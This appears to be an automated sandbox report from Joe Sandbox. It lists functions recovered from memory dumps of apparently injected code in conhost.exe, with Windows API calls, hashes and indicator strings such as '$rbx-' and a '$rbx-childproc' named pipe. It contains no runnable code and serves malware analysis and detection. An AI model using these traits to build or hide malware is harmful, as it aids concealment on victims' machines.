Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 3caeded21bc9947aeec7a14594077d13e82a28317acb15a83f14b0693847c382
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 68318236A00A429AF721DF12A808759B3A1F788BDAF64453E9E4947F35DF38C455C741

Function 000002BCD7E334B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 000002BCD7E33516
GetProcessHeap.KERNEL32 ref: 000002BCD7E33527
HeapAlloc.KERNEL32 ref: 000002BCD7E33535
PdhGetCounterInfoW.PDH ref: 000002BCD7E3354B
StrCmpW.SHLWAPI ref: 000002BCD7E33560

Part of subcall function 000002BCD7E33950: StrCmpNW.SHLWAPI ref: 000002BCD7E33972
Part of subcall function 000002BCD7E33950: StrStrW.SHLWAPI ref: 000002BCD7E33990
Part of subcall function 000002BCD7E33950: StrToIntW.SHLWAPI ref: 000002BCD7E339B7

GetProcessHeap.KERNEL32 ref: 000002BCD7E3358D
HeapFree.KERNEL32 ref: 000002BCD7E3359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000002BCD7E33559

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 0802601ce66cd945419439b3df121fce96515b8c16b28663905edabf7c4102ed
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 6C316B3AA10B429EEB10DF22A888B5977A0B784F99F64413F9E4A43F35EF38C455C741

Function 000002BCD7E3A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002BCD7E3A289

Part of subcall function 000002BCD7E3B144: __GetUnwindTryBlock.LIBCMT ref: 000002BCD7E3B187
Part of subcall function 000002BCD7E3B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002BCD7E3B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002BCD7E3A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002BCD7E3A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000002BCD7E3A6BC

Strings

csm, xrefs: 000002BCD7E3A384
csm, xrefs: 000002BCD7E3A2A3
csm, xrefs: 000002BCD7E3A30A

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 365f5137e85308b0a15eb217e65687ba24d9c7d08530c0caaa083e4f7ad03142
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 16D18D7A604B818EEB20EF66D4483AD77A4F745799F20013BEE8957F96DB38C490C702

Function 000002BCD7E0962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002BCD7E09689

Part of subcall function 000002BCD7E0A544: __GetUnwindTryBlock.LIBCMT ref: 000002BCD7E0A587
Part of subcall function 000002BCD7E0A544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002BCD7E0A5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002BCD7E09761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002BCD7E099AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000002BCD7E09ABC

Strings

csm, xrefs: 000002BCD7E096A3
csm, xrefs: 000002BCD7E09784
csm, xrefs: 000002BCD7E0970A

Memory Dump Source

Source File: 00000014.00000003.2594886169.000002BCD7E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BCD7E00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2bcd7e00000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 55074a64cf958c4804fdd03884f51e2de301ee65d3555530f4197b87262e1baa
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: C7D19F3A6047828EEB60DF65D48C3AD77A4F755788F24023AEE8957F9ADB34C091C702

Function 000002BCD7E3104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002BCD7E310B1
RegEnumValueW.ADVAPI32 ref: 000002BCD7E31117
GetProcessHeap.KERNEL32 ref: 000002BCD7E3115A
HeapAlloc.KERNEL32 ref: 000002BCD7E31168
GetProcessHeap.KERNEL32 ref: 000002BCD7E31185
HeapFree.KERNEL32 ref: 000002BCD7E31193

Strings

d, xrefs: 000002BCD7E310D6

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 31c12e656c52d2f433d12936568b295b0e9ce996a54b8e2677b47d3da47a5297
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 8D417B37214B81DAE760CF21E44839A77B1F389B99F54813EDA8947B58DF38C489CB41

Function 000002BCD7E32518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002BCD7E3252D
GetCurrentProcessId.KERNEL32 ref: 000002BCD7E32537
CreateFileW.KERNEL32 ref: 000002BCD7E32568
WriteFile.KERNEL32 ref: 000002BCD7E32590
ReadFile.KERNEL32 ref: 000002BCD7E325AF
CloseHandle.KERNEL32 ref: 000002BCD7E325B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 000002BCD7E32549

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 7e06337903e75c23e37c12ad2a0d2cc9037f5e2f7b3715832d5a26173bb0f8cd
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: A4113A3A614B4186E7108B21F41D35A7760F389B99FA4023AEA9902FA8DF7CC154CB82

Function 000002BCD7E37C50 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002BCD7E37C78
__scrt_acquire_startup_lock.LIBCMT ref: 000002BCD7E37CCA
_RTC_Initialize.LIBCMT ref: 000002BCD7E37CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002BCD7E37D1E
__scrt_release_startup_lock.LIBCMT ref: 000002BCD7E37D49

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: c4fefd4a9d3c06707a3a3fb2b5b4426dd8c89961196979cb3eda7697a403f6e3
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 8281F53C6006674EFB90ABA6948D36973D0BB86786F74413FA94847F96DB38C851C713

Function 000002BCD7E07050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002BCD7E07078
__scrt_acquire_startup_lock.LIBCMT ref: 000002BCD7E070CA
_RTC_Initialize.LIBCMT ref: 000002BCD7E070F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002BCD7E0711E
__scrt_release_startup_lock.LIBCMT ref: 000002BCD7E07149

Memory Dump Source

Source File: 00000014.00000003.2594886169.000002BCD7E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BCD7E00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2bcd7e00000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: e0d48adc6b46b274f3ad1194b3122bad59a2ce4ed3fe266ccf5e360902ee3dda
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: A181B0786002634EFE54AB65984E39973D1AB86780F74413FAD4947FD6DB38C846C743

Function 000002BCD7E39AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,?,?,000002BCD7E39C6B,?,?,?,000002BCD7E3945C,?,?,?,?,000002BCD7E38F65), ref: 000002BCD7E39B31
GetLastError.KERNEL32(?,?,?,000002BCD7E39C6B,?,?,?,000002BCD7E3945C,?,?,?,?,000002BCD7E38F65), ref: 000002BCD7E39B3F
LoadLibraryExW.KERNEL32(?,?,?,000002BCD7E39C6B,?,?,?,000002BCD7E3945C,?,?,?,?,000002BCD7E38F65), ref: 000002BCD7E39B69
FreeLibrary.KERNEL32(?,?,?,000002BCD7E39C6B,?,?,?,000002BCD7E3945C,?,?,?,?,000002BCD7E38F65), ref: 000002BCD7E39BD7
GetProcAddress.KERNEL32(?,?,?,000002BCD7E39C6B,?,?,?,000002BCD7E3945C,?,?,?,?,000002BCD7E38F65), ref: 000002BCD7E39BE3

Strings

api-ms-, xrefs: 000002BCD7E39B51

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 60601e00f3237b0bc8c7e55f3a8f0e3b762862db94274aadd299469441c58cb3
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: D731A13A312A42D9EE119B06A8087A533D4BB44BA9F69063EED1D4BF90EF38C454C756

Function 000002BCD7E43400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002BCD7E43431
GetLastError.KERNEL32 ref: 000002BCD7E4343D
CloseHandle.KERNEL32 ref: 000002BCD7E43455
CreateFileW.KERNEL32 ref: 000002BCD7E43480
WriteConsoleW.KERNEL32 ref: 000002BCD7E4349F

Strings

CONOUT$, xrefs: 000002BCD7E43461

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 1f58a137a26dd54c8740bc9b7f87a824de14f3104c5429cb43184a53cffee3f9
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: CD119039310B418AE7508B52E85871977A0F388BE8F60023EEA5E87F94DF38C424C781

Function 000002BCD7E36270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002BCD7E362AB
GetThreadContext.KERNEL32 ref: 000002BCD7E36415

Part of subcall function 000002BCD7E360A0: GetCurrentThreadId.KERNEL32 ref: 000002BCD7E360A4

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: 4cd9e032b4e0d69a99e38f62031084f7f4bc6945d93e2c67aea9160a9a0311f7
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 44D17C7A204B8985DA709B1AE49835A77B0F7C8B99F60013BEA8D47F69DF3CC551CB01

Function 000002BCD7E32098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000002BCD7E320A6
TlsFree.KERNEL32 ref: 000002BCD7E3225F
TlsFree.KERNEL32 ref: 000002BCD7E3226B
TlsFree.KERNEL32 ref: 000002BCD7E32277
TlsFree.KERNEL32 ref: 000002BCD7E32283
TlsFree.KERNEL32 ref: 000002BCD7E3228F

Part of subcall function 000002BCD7E35E50: GetCurrentThreadId.KERNEL32 ref: 000002BCD7E35E66

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 8e88c89f4f8d762ac4a8665fb1c54bd48459f249f499404db27d36363f4cfd8b
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 27511738201B479DEB09DB25E85929433A5FB0474AFA0093FE56D46FA5EF38D528C382

Function 000002BCD7E335C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000002BCD7E324D1), ref: 000002BCD7E335EB
HeapAlloc.KERNEL32(?,?,?,?,?,000002BCD7E324D1), ref: 000002BCD7E335FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000002BCD7E324D1), ref: 000002BCD7E33673
GetProcessHeap.KERNEL32(?,?,?,?,?,000002BCD7E324D1), ref: 000002BCD7E336D9
HeapFree.KERNEL32(?,?,?,?,?,000002BCD7E324D1), ref: 000002BCD7E336E7

Strings

$rbx-, xrefs: 000002BCD7E3366C

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 2869eaaf50e9d2ee6512ec1e9ef8a2db4943dded60aae236ae8549e79e0a6c69
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 44319D3A701B528FEB14DF16A548B69B3A0FB44B85F29403A8F4947F66EF34C4A1C741

Function 000002BCD7E3C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002BCD7E3C94F
SetLastError.KERNEL32 ref: 000002BCD7E3C96E
FlsSetValue.KERNEL32 ref: 000002BCD7E3C997
FlsSetValue.KERNEL32 ref: 000002BCD7E3C9A8
FlsSetValue.KERNEL32 ref: 000002BCD7E3C9B9

Part of subcall function 000002BCD7E3D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002BCD7E3674A), ref: 000002BCD7E3D2B6
Part of subcall function 000002BCD7E3D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002BCD7E3674A), ref: 000002BCD7E3D2C0

SetLastError.KERNEL32 ref: 000002BCD7E3C9DC

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 4d07f44c437271609310e48c7e8f39896cb90feb090f81c3f1fef6d4e83ea818
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: BB11A33E3002438AFA14A735681D76E3351AB84796FB4463FAC2656FDADF38C411D302

Function 000002BCD7E31A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000002BCD7E31A56
K32GetModuleFileNameExW.KERNEL32 ref: 000002BCD7E31A74
PathFindFileNameW.SHLWAPI ref: 000002BCD7E31A83
lstrlenW.KERNEL32 ref: 000002BCD7E31A8F
StrCpyW.SHLWAPI ref: 000002BCD7E31AA2
CloseHandle.KERNEL32 ref: 000002BCD7E31AB0

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 3c626c01ed5105cbca0764bbcf99d8b04cdffb0cef5e23ae80935f7ef83dd366
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 5E011B39704A428AEB14DB12A85C35973A1F788FC9F68403EDE5D83B54DF38C995C781

Function 000002BCD7E33E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000002BCD7E33AAC), ref: 000002BCD7E33E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BCD7E33AAC), ref: 000002BCD7E33E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002BCD7E33AAC), ref: 000002BCD7E33E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BCD7E33AAC), ref: 000002BCD7E33E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002BCD7E33AAC), ref: 000002BCD7E33E9F
TerminateThread.KERNEL32(?,?,?,?,?,000002BCD7E33AAC), ref: 000002BCD7E33EAE

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: 2aab8e0c98c76cbce2429163464a57b4e109f7f2382b7a149ad51ba9107b5028
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: 1001297D311B468AFB249B22E84D71973A0BB49B89F24013ECA4D46BA5EF3DC458C742
